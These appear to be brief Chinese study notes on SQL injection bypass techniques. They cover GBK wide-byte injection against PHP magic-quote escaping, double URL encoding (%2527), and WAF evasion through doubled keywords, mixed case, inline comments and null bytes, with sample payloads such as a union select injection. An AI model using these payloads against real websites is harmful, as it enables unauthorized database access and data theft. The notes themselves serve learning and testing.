gbk 编码宽字符注入
魔术引号:"\"
在php 里面,系统判断用户提交的数据里面有单引号,双引号,/等特殊字符,然后使用魔术信号,即转义字符将用户输入的特殊字符进行转义,从而使用户输入的字符失去原本的效果
转义字符编码为%5c
宽字节注入就是利用能和%5c在一起能组成其他字符的编码和%5c组成新的字符,从而绕过系统防御
例如%bf和%5c组成新的汉字,%dd%5c, %df%5c
id=1%dd' union select xxxx
URL解码注入
代码里面使用url将输入内容进行编码
$id=urlcode(addslashs($_GET['id']))
%25 对应的url編碼為%
%2527====%27
id=%2527 and 1=1 --+
双写绕过:
select and被屏蔽时:selselectect anandd
大小写绕过:
SelecT AnD Or
特殊字符绕过:and && or ||
内联注释:select username from /*! user */ /*!union*/ select
00截断:
sel%00ect ,mysql 中不会截断,但是wag 可能认为截断
% : sel%ect ,如果是iis+asp 百分号会被忽略